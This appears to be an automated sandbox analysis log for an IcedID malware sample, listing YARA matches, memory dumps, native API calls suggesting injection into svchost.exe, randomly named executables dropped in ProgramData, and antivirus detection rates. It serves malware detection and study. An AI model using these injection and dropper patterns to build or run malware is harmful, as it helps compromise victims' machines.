Source: 18.2.tfykdkdkdk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000006.00000003.1477441952.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000016.00000003.2450165604.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000006.00000002.1478560194.000000000073A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000016.00000002.2451300303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000010.00000002.1725192605.000000000058A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000018.00000003.2700767215.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000012.00000003.1951491009.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000014.00000002.2218733852.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000004.00000003.1250459151.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000005.00000002.3296224189.0000000002691000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 0000001B.00000002.2950973983.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000012.00000002.1953164296.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000017.00000002.3295830268.0000000002891000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000004.00000002.1251555372.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000012.00000002.1953599695.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000000.00000002.1024729856.000000000067D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 0000001C.00000002.2951130325.0000000002A51000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000004.00000002.1251180113.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000000.00000003.1022438413.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000012.00000002.1953599695.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000010.00000002.1724669146.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000018.00000002.2702209444.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000010.00000002.1725192605.000000000056D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000014.00000002.2218293819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000000.00000002.1024321997.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000018.00000002.2702209444.000000000071A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 0000001B.00000003.2949720196.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000014.00000003.2217134294.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000006.00000002.1478560194.000000000071D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000004.00000002.1251555372.000000000077D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000016.00000002.2451887534.000000000077A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000000.00000002.1024729856.000000000069B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000016.00000002.2451887534.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000018.00000002.2701702242.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000010.00000003.1723691324.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 00000014.00000002.2218733852.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload
Source: 0000001B.00000002.2950973983.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: IcedID author = kevoreilly, description = IcedID Payload, cape_type = IcedID Payload

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_00407ED8	0_2_00407ED8
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_00407DAC	0_2_00407DAC
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_00407CB5	0_2_00407CB5
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_00407ED8	4_2_00407ED8
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_00407DAC	4_2_00407DAC
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_00407CB5	4_2_00407CB5
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Code function: 6_2_00407ED8	6_2_00407ED8
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Code function: 6_2_00407DAC	6_2_00407DAC
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Code function: 6_2_00407CB5	6_2_00407CB5
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Code function: 16_2_00407ED8	16_2_00407ED8
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Code function: 16_2_00407DAC	16_2_00407DAC
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Code function: 16_2_00407CB5	16_2_00407CB5
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Code function: 18_2_00407ED8	18_2_00407ED8
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Code function: 18_2_00407DAC	18_2_00407DAC
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Code function: 18_2_00407CB5	18_2_00407CB5
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Code function: 20_2_00407ED8	20_2_00407ED8
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Code function: 20_2_00407DAC	20_2_00407DAC
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Code function: 20_2_00407CB5	20_2_00407CB5
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Code function: 22_2_00407ED8	22_2_00407ED8
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Code function: 22_2_00407DAC	22_2_00407DAC
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Code function: 22_2_00407CB5	22_2_00407CB5
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Code function: 24_2_00407ED8	24_2_00407ED8
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Code function: 24_2_00407DAC	24_2_00407DAC
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Code function: 24_2_00407CB5	24_2_00407CB5
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Code function: 27_2_00407ED8	27_2_00407ED8
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Code function: 27_2_00407DAC	27_2_00407DAC
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Code function: 27_2_00407CB5	27_2_00407CB5

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_02533923 WTSGetActiveConsoleSessionId,memset,CreateProcessAsUserW,

3_2_02533923

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_0040160F NtWriteVirtualMemory,	0_2_0040160F
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_004010CF OutputDebugStringA,NtCreateUserProcess,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,	0_2_004010CF
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_004015EE NtProtectVirtualMemory,	0_2_004015EE
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Code function: 0_2_004015BE OutputDebugStringA,NtAllocateVirtualMemory,	0_2_004015BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_02532BA4 NtProtectVirtualMemory,NtProtectVirtualMemory,	3_2_02532BA4
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_0040160F NtWriteVirtualMemory,	4_2_0040160F
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_004010CF OutputDebugStringA,NtCreateUserProcess,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,	4_2_004010CF
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_004015EE NtProtectVirtualMemory,	4_2_004015EE
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Code function: 4_2_004015BE OutputDebugStringA,NtAllocateVirtualMemory,	4_2_004015BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_02692BA4 NtProtectVirtualMemory,NtProtectVirtualMemory,	5_2_02692BA4
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Code function: 6_2_0040160F NtWriteVirtualMemory,	6_2_0040160F
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Code function: 6_2_004010CF OutputDebugStringA,NtCreateUserProcess,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,	6_2_004010CF
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Code function: 6_2_004015EE NtProtectVirtualMemory,	6_2_004015EE
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Code function: 6_2_004015BE OutputDebugStringA,NtAllocateVirtualMemory,	6_2_004015BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 15_2_027E2BA4 NtProtectVirtualMemory,NtProtectVirtualMemory,	15_2_027E2BA4
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Code function: 16_2_0040160F NtWriteVirtualMemory,	16_2_0040160F
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Code function: 16_2_004010CF OutputDebugStringA,NtCreateUserProcess,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,	16_2_004010CF
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Code function: 16_2_004015EE NtProtectVirtualMemory,	16_2_004015EE
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Code function: 16_2_004015BE OutputDebugStringA,NtAllocateVirtualMemory,	16_2_004015BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 17_2_02EC2BA4 NtProtectVirtualMemory,NtProtectVirtualMemory,	17_2_02EC2BA4
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Code function: 18_2_0040160F NtWriteVirtualMemory,	18_2_0040160F
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Code function: 18_2_004010CF OutputDebugStringA,NtCreateUserProcess,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,	18_2_004010CF
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Code function: 18_2_004015EE NtProtectVirtualMemory,	18_2_004015EE
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Code function: 18_2_004015BE OutputDebugStringA,NtAllocateVirtualMemory,	18_2_004015BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 19_2_02AC2BA4 NtProtectVirtualMemory,NtProtectVirtualMemory,	19_2_02AC2BA4
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Code function: 20_2_0040160F NtWriteVirtualMemory,	20_2_0040160F
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Code function: 20_2_004010CF OutputDebugStringA,NtCreateUserProcess,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,	20_2_004010CF
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Code function: 20_2_004015EE NtProtectVirtualMemory,	20_2_004015EE
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Code function: 20_2_004015BE OutputDebugStringA,NtAllocateVirtualMemory,	20_2_004015BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 21_2_02F72BA4 NtProtectVirtualMemory,NtProtectVirtualMemory,	21_2_02F72BA4
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Code function: 22_2_0040160F NtWriteVirtualMemory,	22_2_0040160F
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Code function: 22_2_004010CF OutputDebugStringA,NtCreateUserProcess,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,	22_2_004010CF
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Code function: 22_2_004015EE NtProtectVirtualMemory,	22_2_004015EE
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Code function: 22_2_004015BE OutputDebugStringA,NtAllocateVirtualMemory,	22_2_004015BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 23_2_02892BA4 NtProtectVirtualMemory,NtProtectVirtualMemory,	23_2_02892BA4
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Code function: 24_2_0040160F NtWriteVirtualMemory,	24_2_0040160F
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Code function: 24_2_004010CF OutputDebugStringA,NtCreateUserProcess,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,	24_2_004010CF
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Code function: 24_2_004015EE NtProtectVirtualMemory,	24_2_004015EE
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Code function: 24_2_004015BE OutputDebugStringA,NtAllocateVirtualMemory,	24_2_004015BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02B12BA4 NtProtectVirtualMemory,NtProtectVirtualMemory,	26_2_02B12BA4
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Code function: 27_2_0040160F NtWriteVirtualMemory,	27_2_0040160F
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Code function: 27_2_004010CF OutputDebugStringA,NtCreateUserProcess,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,	27_2_004010CF
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Code function: 27_2_004015EE NtProtectVirtualMemory,	27_2_004015EE
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Code function: 27_2_004015BE OutputDebugStringA,NtAllocateVirtualMemory,	27_2_004015BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 28_2_02A52BA4 NtProtectVirtualMemory,NtProtectVirtualMemory,	28_2_02A52BA4

Source: GziaFibS0d.exe, 00000000.00000003.1022750476.00000000027A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs GziaFibS0d.exe
Source: GziaFibS0d.exe, 00000000.00000002.1024589858.0000000000435000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameduringstore.exe8 vs GziaFibS0d.exe
Source: GziaFibS0d.exe	Binary or memory string: OriginalFilenameduringstore.exe8 vs GziaFibS0d.exe

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: GziaFibS0d.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rencz.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tsuvgo.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: zipdk.exe.15.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tfykdkdkdk.exe.17.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ayxuiczvtsui.exe.19.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ziczv.exe.21.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: uvtsuvts.exe.23.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: czipqtsh.exe.26.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: GziaFibS0d.exe	ReversingLabs: Detection: 78%
Source: GziaFibS0d.exe	Virustotal: Detection: 81%

Source: GziaFibS0d.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\GziaFibS0d.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\GziaFibS0d.exe C:\Users\user\Desktop\GziaFibS0d.exe
Source: C:\Users\user\Desktop\GziaFibS0d.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown	Process created: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown	Process created: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown	Process created: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown	Process created: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown	Process created: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown	Process created: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown	Process created: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: unknown	Process created: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
